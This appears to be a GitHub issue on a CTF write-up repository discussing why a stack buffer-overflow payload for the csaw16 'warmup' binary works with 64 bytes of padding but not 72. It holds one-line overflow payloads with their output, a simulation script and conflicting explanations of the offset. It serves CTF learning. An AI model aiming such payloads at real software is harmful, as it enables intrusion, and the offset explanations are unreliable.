Exploit for csaw16_warmup not working.
Closed this issue · 3 comments
Hi,
First of all great repo and thanks for putting your time into it.
I have been working on the warmup binary and at the end of it I came to the conclusion that our buffer is stored at 0x7fffffffdef0, so to reach rbp it would need $rbp - 0x7fffffffdef0, i.e. 0x40 bytes, and to reach RIP it would need rbp+8 bytes, i.e. 0x48 bytes.
But the exploit isn't working for 0x48, i.e. 72 bytes, and when I tried to debug the binary it worked with 0x40 bytes + the return address of the easy function.
I don't understand why it worked with 72 bytes in total and not 72 bytes + ret.
Please help me out here.
```shell
rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 64 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
WINWIN
-Warm Up-
WOW:0x40060d
```
Whereas:
```shell
rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 72 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
Segmentation fault (core dumped)
```
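The following is an added example, not code from this repository or from the issue reporter. It models the frame layout the reporter computed (buffer at 0x7fffffffdef0, 0x40 bytes below rbp, with the saved rbp at +0x40 and the return address at +0x48) and simulates what `gets()` writes into those two slots for the 64-byte and 72-byte payloads above. The original saved-rbp and return-address contents are constructed placeholders, and `p64` is a plain `struct.pack` stand-in for `pwn.p64`. Two things it makes visible: with 64 bytes of padding the target address lands in the saved-rbp slot, which `ret` never reads, and the NUL terminator that `gets()` appends clobbers the low byte of the real return address; with 72 bytes of padding the target lands in the return-address slot. A practical caveat when taking these numbers from a debugger: absolute stack addresses shift between gdb and a plain run (environment variables and ASLR move the stack), but the distance `rbp - buffer` is fixed by the compiler, so measure the offset, not the raw addresses.

```python
import struct

# Numbers taken from the issue: buffer at 0x7fffffffdef0, 0x40 bytes below rbp,
# and easy() at 0x40060d. The two ORIG_* values are constructed placeholders
# for whatever main's caller left in those slots; they are not from the binary.
BUF_ADDR = 0x7fffffffdef0
RBP_ADDR = BUF_ADDR + 0x40
EASY_ADDR = 0x40060d
ORIG_SAVED_RBP = 0x4006b0        # constructed placeholder
ORIG_RET_ADDR = 0x7ffff7a2d830   # constructed placeholder (libc-style return site)


def p64(value):
    """Pack a 64-bit little-endian integer; equivalent to pwn.p64()."""
    return struct.pack("<Q", value)


def u64(raw):
    """Unpack 8 little-endian bytes into an integer; equivalent to pwn.u64()."""
    return struct.unpack("<Q", bytes(raw))[0]


def offsets(buf_addr, rbp_addr):
    """Offsets from the buffer start to the saved rbp and to the return address.

    Only the difference matters: the absolute addresses change from run to run,
    the frame layout does not.
    """
    to_rbp = rbp_addr - buf_addr
    return {"saved_rbp": to_rbp, "ret_addr": to_rbp + 8}


def build_payload(padding, target):
    """The 'A' * N + p64(target) payload shape used in the issue."""
    return b"A" * padding + p64(target)


def simulate_gets(payload, buf_addr, rbp_addr):
    """Model gets() copying `payload` plus its NUL terminator into the frame.

    Returns what ends up in the saved-rbp and return-address slots so you can
    see which one a given padding length actually overwrites.
    """
    off = offsets(buf_addr, rbp_addr)
    # Frame image: buffer, saved rbp, return address, then 8 bytes of slack so
    # the terminator never falls off the end of the simulated stack.
    frame = bytearray(off["saved_rbp"]) + p64(ORIG_SAVED_RBP) + p64(ORIG_RET_ADDR) + bytes(8)
    data = payload + b"\x00"          # gets() always appends a NUL after the line
    frame[:len(data)] = data
    return {
        "saved_rbp": u64(frame[off["saved_rbp"]:off["saved_rbp"] + 8]),
        "ret_addr": u64(frame[off["ret_addr"]:off["ret_addr"] + 8]),
    }


def slot_hit(padding, buf_addr, rbp_addr):
    """Name of the 8-byte slot that p64(target) lands in for this padding, or None."""
    for name, off in offsets(buf_addr, rbp_addr).items():
        if padding == off:
            return name
    return None


if __name__ == "__main__":
    print("offsets:", {k: hex(v) for k, v in offsets(BUF_ADDR, RBP_ADDR).items()})
    for padding in (64, 72):
        result = simulate_gets(build_payload(padding, EASY_ADDR), BUF_ADDR, RBP_ADDR)
        print(f"padding {padding}: target lands in {slot_hit(padding, BUF_ADDR, RBP_ADDR)};",
              {k: hex(v) for k, v in result.items()})
```

Run it as a script to see both layouts side by side. To compare against a live run, set a breakpoint right after the `gets()` call in gdb and inspect `x/2gx $rbp`: the first quadword is the saved rbp slot, the second is the return address, and whichever of them holds 0x40060d tells you which padding length you actually needed.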
Hello, thank you for the issue. I see what you mean with the offset being 0x40 instead of 0x48. It looks like something to do with the different environments the binary is run in affecting that. Just to be sure, I double-checked other writeups for the same problem, and the supposed correct offset is 0x48, so it looks like it's an issue with the environment the binary is run in causing the difference in offset. Thank you and have a nice day!
Also, I pushed a comment for that writeup mentioning this.